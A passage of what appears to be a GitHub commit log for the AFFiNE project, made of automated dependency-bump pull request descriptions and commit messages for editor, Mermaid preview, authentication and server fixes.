the API ([fcc9aae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcc9aaec76f6e1075e520b75118a9ca77a596dfb)) - **localservices:** update the API ([ca0c8d7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ca0c8d7c7409cccbdf436d539119f093d3f62eec)) - **looker:** update the API ([0c067fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c067fa5944b446b3b6766b57aec7ab646f08ba1)) - **managedidentities:** update the API ([1f430c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1f430c5ffd6aa522f4d99978a3a719918295a231)) - **manufacturers:** update the API ([d55ac4f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d55ac4f151d006e4d975eede60e491877a706a93)) - **memcache:** update the API ([39c011c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/39c011c3681af3e906b370080a2ca8a6caf83fa0)) - **ml:** update the API ([bf42196](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bf421969326b70fae5d4c6cddc432546004ec0f0)) - **mybusinessaccountmanagement:** update the API ([ce386e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ce386e47e08737a2252203bc30d39229d9be595a)) - **mybusinessbusinessinformation:** update the API ([cdaeb3b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cdaeb3bc7d8a80dfee13dd0de6dbc5a6f93f5c7c)) - **mybusinesslodging:** update the API ([34eda38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/34eda38c76099f2aa6b906505fb7f2b33c43cf26)) - **mybusinessnotifications:** update the API ([ae38037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ae38037c11139e45813fd0306e3357129b036e1d)) - **mybusinessplaceactions:** update the API ([c9f5ea0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c9f5ea0ebe9ee56b0c600367122f2f833fc82d33)) - **mybusinessqanda:** update the API ([9d43c1e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d43c1e6ee4654d8bfff86aa44eee91c212e2aef)) - **mybusinessverifications:** update the API ([60bdbd2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/60bdbd229b5a25345953be1eff11813b10840902)) - **networksecurity:** update the API ([b4ab725](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b4ab7254926c2a80445481f490eb9738a7399f93)) - **networkservices:** update the API ([0cf9456](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0cf9456b33165b03510406f5173f875aa67b15c8)) - **notebooks:** update the API ([71b9980](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/71b99805f4a3b99585c09a1b5442e2e43be45d13)) - **oauth2:** update the API ([db72d5d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72d5d788e26b83dac6603dd0c66280e48643fe)) - **osconfig:** update the API ([fc51160](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc5116090ac8e177af2cfe17ed5bb938d1f27470)) - **oslogin:** update the API ([d814cb9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d814cb920dcb533086161c1e8cba819aa36b7c6d)) - **pagespeedonline:** update the API ([ea4b6e3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ea4b6e327902369d129eab3b4433509d3e488c36)) - **people:** update the API ([d2f704e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d2f704e98cef30bc42636f7aa866bd0a2b586f20)) - **places:** update the API ([7dd5993](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7dd5993f4d5adbfd6eeed73bad1c066594fa8ffe)) - **playcustomapp:** update the API ([301c3ad](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/301c3adda469b043a7d0c632fb6b41f06c918a78)) - **playdeveloperreporting:** update the API ([7e73906](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7e7390622559837e06f16e7303d286eedf2a58ed)) - **playgrouping:** update the API ([9753005](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9753005a61f6aeaab0e433f2691b635508721923)) - **playintegrity:** update the API ([78dfca2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78dfca25343031a78ba17ce5a9f84b4b449ff3c3)) - **policyanalyzer:** update the API ([703ab7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/703ab7bcbcd642386a483f5a70056a41b73f40ce)) - **policysimulator:** update the API ([4a7be29](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4a7be29e56b02985916e9a5e0563f4c447980134)) - **policytroubleshooter:** update the API ([a556194](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a556194c602dd8f577f043908a7647667c6ac3f4)) - **poly:** update the API ([12d5e41](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/12d5e413c9db34fc5c1c34ab4773499c5f8c9c3b)) - **prod\_tt\_sasportal:** update the API ([5dfac38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5dfac38e84b1d21146a9fecd9ead4a04d81e19f8)) - **publicca:** update the API ([e7906c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e7906c5b474e2303a50a91dd15b3c0ca37ffbff8)) - **pubsublite:** update the API ([f06ab43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f06ab430e6095263623df08ac0ff727c9ec9c332)) - **rapidmigrationassessment:** update the API ([3fe4f53](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3fe4f53ee08c594ac96fbe126918d555910d962a)) - **readerrevenuesubscriptionlinking:** update the API ([c2996fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2996fac1a3f5c48fa0a0be9fa2b8b070f0e0a66)) - **realtimebidding:** update the API ([e05daef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e05daefcd22ec574a00043ba5dbc13e7097b9970)) - **recommendationengine:** update the API ([7b4553c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b4553c671f92881f12ca6b0c6d13b9897cff259)) - **recommender:** update the API ([827d7fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/827d7fcf0b01ee4bb097d0e9b258dacfd903d4de)) - **reseller:** update the API ([3b0d62c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3b0d62ce52be031269cc38d461464fde58015af4)) - **resourcesettings:** update the API ([b499612](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b49961200508406ed5dc860b66d671a1598026b0)) - **runtimeconfig:** update the API ([f4f60c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f4f60c410d6d7a39d585a3f9711bd1e398cf1d42)) - **safebrowsing:** update the API ([ec3ca1a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec3ca1abec9b9a90efafba0840ad34bcaf28a24c)) - **sasportal:** update the API ([a6a96bc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a6a96bc8ee62e20c1dd078e8074b07ea523a58fd)) - **script:** update the API ([582352f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/582352f283013f76babffc3f34de45aff10fb44e)) - **searchconsole:** update the API ([25ad1ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/25ad1ff213231bf47f909b48349a356b14d5dac6)) - **secretmanager:** update the API ([0d6d936](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0d6d93683ed834ad4414635c8408d1cbacda2c54)) - **servicedirectory:** update the API ([a550687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a55068740ecafc29a193fe17a0d207e9becfdcac)) - **servicemanagement:** update the API ([74cb0a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74cb0a2a62c6b29337808ad6fef57daf5c5afed5)) - **siteVerification:** update the API ([a0d8969](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a0d896969a6635f013a428cc58519075e58f7cfc)) - **slides:** update the API ([3e4be4b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e4be4b9af47252b6b59de71255b08b2643f63df)) - **smartdevicemanagement:** update the API ([6ec4bd9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ec4bd90d316f93cd12000ae76feb395c327100e)) - **solar:** update the API ([4377037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4377037197348f7908f9c0a5937d2acd938ba2e5)) - **sourcerepo:** update the API ([0889507](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/088950701aeffc7aa8e6f2f17f955023e05494e1)) - **speech:** update the API ([504c8d0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/504c8d07f3a9363908cdee44b31294d97087956d)) - **storagetransfer:** update the API ([aee9c44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aee9c449cf7b6592a91674d8acf83c3f24089b87)) - **storage:** update the API ([cd03772](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd037720cda614720bef7852812b1eb99d86d25f)) - **streetviewpublish:** update the API ([3a0401c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3a0401c216fd3c4bc8c11913572cf4f628df4813)) - **sts:** update the API ([bce176a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bce176a17c9e5ff821d2e6a058720f9f744e18b4)) - **tagmanager:** update the API ([594c354](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/594c354031bb89976ac2b46054c2e0cf6bcd3ed0)) - **tasks:** update the API ([4203139](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4203139d06bd3b8487d1d0e2d29b92ba7d9a6975)) - **testing:** update the API ([5d373cc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5d373cc08c089156b7ca26d52fd51c059e5c1227)) - **texttospeech:** update the API ([366a3fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/366a3fc5e1e88c28e0500dbd72970b52bfa442e0)) - **toolresults:** update the API ([ad28679](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad28679c983fdc6df90a2cfa73175f7d6f41c741)) - **transcoder:** update the API ([1799ca0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1799ca0e2b6c03a21e2dfecfcdd20efaf866222f)) - **translate:** update the API ([6ef599c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ef599c831d7a797b797faf3736ac6514d6bf5c0)) - **travelimpactmodel:** update the API ([be498cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/be498cde964258f31edd0d32e5032555b4bf0211)) - **vault:** update the API ([cb9bc44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cb9bc4432053217aa68d18b283d55a4ca553617f)) - **versionhistory:** update the API ([0e4d78e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e4d78e3b4fdd766a38662bd270453080efd804d)) - **videointelligence:** update the API ([8139c6a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8139c6a6a353c42b878ba2c5751071ecaa06eff0)) - **vision:** update the API ([c6585c7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c6585c79b039060193405d68e865552f579dae19)) - **vmmigration:** update the API ([2664ee2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2664ee2f9c1f01d51d8545f4cab82535fac59846)) - **vmwareengine:** update the API ([fcdd0d9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcdd0d9cc42e7e7b34ec2b431f94043cde95b8e3)) - **vpcaccess:** update the API ([fe1b7f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe1b7f52025c36cd63df1b874d1303ab8e13abab)) - **walletobjects:** update the API ([58fe19c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/58fe19cf6606af287f80afa88f6846a0df9a23c6)) - **webfonts:** update the API ([bd5115d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd5115dbc9c1bdb337f078cfac36bbc5143e41de)) - **webrisk:** update the API ([e227c8e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e227c8ed85845dfaf4aa51b0dd727d53a1a5f9cc)) - **websecurityscanner:** update the API ([3e1d63b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e1d63b7ab93ca294ec0c983851321bc2fb85338)) - **workflowexecutions:** update the API ([3329041](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3329041d025edb6a14756e9f15324f6265e7a1e2)) - **workflows:** update the API ([b75aa48](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b75aa48a774260202f951f0b0b45255c8b346d69)) - **workspaceevents:** update the API ([78acf6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78acf6bdcb0197c34bc4f7950ed4bf351d386b59)) - **youtubeAnalytics:** update the API ([5fdf519](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5fdf519aebe3d4dfaa7fd477d1121dbc9bd1280f)) - **youtubereporting:** update the API ([87c5dcc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87c5dcc04c98a5defa4a271125cd5a248eca800a)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwNi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f98688f6c7 |
chore: bump up oxlint to v1.68.0 (#15071)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [oxlint](https://oxc.rs/docs/guide/usage/linter) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint)) | [`1.67.0` → `1.68.0`](https://renovatebot.com/diffs/npm/oxlint/1.67.0/1.68.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/oxc (oxlint)</summary> ### [`v1.68.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1680---2026-06-01) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.67.0...oxlint_v1.68.0) ##### 🚀 Features - [`e4b1f46`](https://redirect.github.com/oxc-project/oxc/commit/e4b1f46) linter/typescript: Implement `method-signature-style` rule ([#​22679](https://redirect.github.com/oxc-project/oxc/issues/22679)) (Mikhail Baev) - [`bc462ca`](https://redirect.github.com/oxc-project/oxc/commit/bc462ca) linter/vue: Implement no-reserved-component-names rule ([#​22741](https://redirect.github.com/oxc-project/oxc/issues/22741)) (bab) - [`ef9e751`](https://redirect.github.com/oxc-project/oxc/commit/ef9e751) linter/vue: Implement component-definition-name-casing rule ([#​22818](https://redirect.github.com/oxc-project/oxc/issues/22818)) (bab) - [`d67f51a`](https://redirect.github.com/oxc-project/oxc/commit/d67f51a) linter/vue: Implement require-prop-type-constructor rule ([#​22708](https://redirect.github.com/oxc-project/oxc/issues/22708)) (bab) - [`8422e8b`](https://redirect.github.com/oxc-project/oxc/commit/8422e8b) linter/jsdoc: Implement `require-yields-description` rule ([#​22805](https://redirect.github.com/oxc-project/oxc/issues/22805)) (Mikhail Baev) - [`fe93f97`](https://redirect.github.com/oxc-project/oxc/commit/fe93f97) linter/eslint: Implement `prefer-named-capture-group` rule ([#​22759](https://redirect.github.com/oxc-project/oxc/issues/22759)) (Sebastian Poxhofer) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
37ffef76a4 |
fix(core): restore Mermaid preview labels and theme-aware contrast (#15073)
fix #14979 [Bug]: mermaid transparent text in light theme ## Summary Mermaid diagram preview in code blocks showed shapes and connectors but no node or edge labels, with poor contrast in dark mode. This change fixes rendering, sanitization, and display so labels are visible in both light and dark themes. ## Root cause 1. **Mermaid 11 config** — `flowchart.htmlLabels: false` is ignored; only root-level `htmlLabels` applies. Labels were still emitted in `<foreignObject>`. 2. **SVG sanitization** — `sanitizeSvg()` removed all `foreignObject` elements (and did not allow `<use>`), stripping most label content. 3. **Theme mismatch** — Preview always used Mermaid’s light `default` theme while the preview panel follows AFFiNE light/dark, causing dark text on dark backgrounds for edge and title text. 4. **Embedded CSS** — Mermaid’s inline SVG styles often do not apply after sanitization, leaving text without a visible `fill`. ## Changes ### Classic renderer (`classic-mermaid.ts`) - Set root-level `htmlLabels: false` (Mermaid 11+). - Map `dark` theme to Mermaid’s built-in `dark` palette. ### Sanitization (`bridge.ts`) - Allow `<use>` and `xlink:href` / `href` for label references. - Allow `class`, `style`, and `id` on SVG nodes. - **Sanitize** `foreignObject` inner HTML with DOMPurify instead of deleting it. ### Preview UI (`mermaid-preview.ts`) - Sync render theme with app `data-theme` (`default` / `dark`) and re-render on theme change. - Add CSS overrides so `text` / `tspan` and HTML inside `foreignObject` use AFFiNE `text/primary`. ### Native / mobile (`preview.rs`) - Map `dark` and `modern` themes to the modern renderer options (light uses `default`). ### Types & tests - Extend `MermaidRenderTheme` with `'dark'`. - Update unit tests for sanitization and classic config. - Add integration test (skips when the test environment cannot lay out Mermaid). ## Test plan - [ ] Hard refresh or restart `yarn dev`. - [ ] Create a `mermaid` code block: `graph TD; A-->B` → enable **Preview**. - [ ] Confirm labels **A** and **B** appear inside nodes and on the edge. - [ ] Toggle AFFiNE **light** / **dark** theme; confirm preview updates and text stays readable. - [ ] Run unit tests: ```bash yarn vitest run packages/frontend/core/src/modules/code-block-preview-renderer/ ``` - [ ] (Optional) With **Enable Native Mermaid Renderer** enabled in experimental settings, repeat the manual check. ## Notes for reviewers - Security: `foreignObject` content is sanitized with the HTML profile; scripts are stripped. - The integration test intentionally skips when Mermaid produces an empty diagram (e.g. happy-dom without full browser layout). <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Mermaid diagrams now adapt to the app's dark or light theme and update in real time. * **Improvements** * SVG sanitization now preserves diagram labels and foreignObject text while removing unsafe content. * Classic Mermaid rendering adjusted to keep text labels intact for previews. * **Tests** * Added unit and integration tests covering Mermaid rendering and SVG sanitization. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
81760fd45c | chore: cleanup legacy logic (#15072) | ||
|
|
8c0e1ba04e |
chore: bump up linter to v1.68.0 (#15069)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.67.0` → `1.68.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.67.0/1.68.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary> ### [`v1.68.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.68.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
aca47445aa |
feat(client): migration old package to rspack (#15068)
#### PR Dependency Tree * **PR #15068** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Upgraded Vitest across packages to 4.1.8 and bumped Tailwind PostCSS to 4.3.0 * CLI/tooling updated to support the media-capture-playground package and adjust build/dev server behavior * **Bug Fixes** * Improved workspace deletion reliability in the Electron app * **Refactor** * Simplified media capture playground build setup (build/config adjustments) * **Tests** * Made tests more robust by preserving/restoring environment state during runs <!-- end of auto-generated comment: release notes by coderabbit.ai -->v2026.6.2-canary.1033 |
||
|
|
69c2f09eba |
fix(editor): keyboard shortcuts in table cells (#15067)
## Description Fixes keyboard shortcuts for text formatting (Ctrl+B, Ctrl+I, Ctrl+U, etc.) not working inside table cells. ## Changes - **Modified `table-cell.ts`**: Updated the `_handleKeyDown` method to only prevent default behavior for Tab key and allow other keyboard events to propagate, enabling text formatting shortcuts to work properly - **Created `table-keymap.ts`**: New module that registers the `textKeymap` for table blocks, ensuring text formatting shortcuts are available in table cells - **Updated `view.ts`**: Registered the `TableKeymapExtension` in the table view extension setup - **Cleaned up `format.ts`**: Removed unnecessary `TextSelection` check that was preventing shortcuts from working in table contexts ## Closes Closes #13916 #12127 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Improved Tab key handling within table cells for more consistent keyboard navigation. * Simplified read-only detection for keyboard shortcuts to avoid unexpected behavior. * **Refactor** * Reworked table keyboard mapping and registration to streamline shortcut handling and event flow. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
75f4c0eede |
feat(editor): add block button for hovering blocks (#14879)
This PR implements [feature request] #14845 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Add-block control that appears when hovering blocks in page mode to insert and auto-focus a new paragraph; control hides after insertion. * **Improvements** * Improved hover and interaction handling to avoid accidental triggers when interacting with the drag handle or add-block control. * Consistent sizing, positioning, and visibility behavior for the add-block control. * **Style** * Moved heading icon slightly for improved visual alignment. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
38110de134 |
fix(core): desktop e2e (#15062)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Sign-in flows now reliably propagate richer authentication results (user data and session type), improving persistence and reducing intermittent sign-in issues. * Native token handling gains a fallback for environments without encrypted storage, improving session reliability. * **New Features** * User-visible warning when sign-in is session-only because encrypted storage is unavailable. * **Chores** * Tooling ignore patterns updated to exclude .codex. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
7123595831 |
chore: bump deps (#15059)
#### PR Dependency Tree * **PR #15059** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Configurable minimum account age before new accounts can invite members or create share links (default: 24 hours). * Sign-in now returns and caches user info for improved session handling. * **Bug Fixes** * Queue handling accepts and resolves job IDs with special characters. * Improved clipboard/rich-text caret handling and nested-list paste reliability. * Calendar tests use dynamic current-month dates. * AI search returns explicit "No matching documents" when none found. * Auth session responses are explicitly non-cacheable. * **Chores** * Dependency and toolchain bumps; admin UI config/schema exposes the new account-age setting. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
78cf402141 |
fix: handle empty results in MCP keyword_search tool (#15058)
## Description Fixes: #15038 — MCP keyword_search tool errors with "Unexpected response type" when no results are found. ### Problem When the MCP `keyword_search` tool returns no matching documents, the access control `.docs()` method may return `undefined`/`null` for an empty input array. Calling `.map()` on this value throws an error, and the MCP framework wraps it as "Unexpected response type". ### Solution Added a guard check after the permission filtering step. If the result is empty or null, the tool now returns a proper informational response instead of throwing. ### Changes - `packages/backend/server/src/plugins/copilot/mcp/provider.ts`: Added null/empty check before `docs.map()` in the keyword_search tool execute function. ### Testing - **Before**: `keyword_search` with a non-existent keyword throws "Unexpected response type" - **After**: `keyword_search` with a non-existent keyword returns `{ content: [{ type: 'text', text: 'No matching documents found.' }] }` <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Prevented errors when document data is missing, improving search stability. * Improved search feedback by displaying a clear "No matching documents found." message instead of empty results. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
ebd3e62ed9 |
fix(server): canary may missing changelog (#15061)
fix #15027 #### PR Dependency Tree * **PR #15061** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Improved handling of missing release notes during upgrade checks. The changelog field now defaults to an empty value when release information is unavailable. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
ce9841df9d |
feat(server): passkey pre-refactor (#15060)
#### PR Dependency Tree * **PR #15060** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * OpenApp native sign-in and native session exchange (JWT) for mobile & desktop. * Centralized short-lived auth challenge store for one-time tokens. * Encrypted per-endpoint token storage and native token handlers (Android, iOS, Electron). * **Improvements** * Richer auth-method reporting (password, magic link, OAuth, passkey) and improved sign-in flows. * Hardened magic-link, OAuth, and session issuance; JWT-backed sessions and websocket JWT support. * UX tweaks: form-based password submit, OTP autocomplete, adjusted captcha flow. * **Bug Fixes** * Expanded tests and auth-state resets to avoid cross-test leakage. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
5b9d51b41b |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.75.0" (#15048)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.74.0"` → `from: "5.75.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.75.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDIuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwMi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.5.31-canary.952 |
||
|
|
18471ef9b2 |
chore: bump up oxlint version to v1.67.0 (#15047)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [oxlint](https://oxc.rs/docs/guide/usage/linter) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint)) | [`1.66.0` → `1.67.0`](https://renovatebot.com/diffs/npm/oxlint/1.66.0/1.67.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/oxc (oxlint)</summary> ### [`v1.67.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1670---2026-05-26) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.66.0...oxlint_v1.67.0) ##### 🚀 Features - [`b84941e`](https://redirect.github.com/oxc-project/oxc/commit/b84941e) linter/vue: Implement no-expose-after-await rule ([#​22675](https://redirect.github.com/oxc-project/oxc/issues/22675)) (bab) - [`98b98c1`](https://redirect.github.com/oxc-project/oxc/commit/98b98c1) linter/vue: Implement no-computed-properties-in-data rule ([#​22674](https://redirect.github.com/oxc-project/oxc/issues/22674)) (bab) - [`2d4c919`](https://redirect.github.com/oxc-project/oxc/commit/2d4c919) oxlint: Support 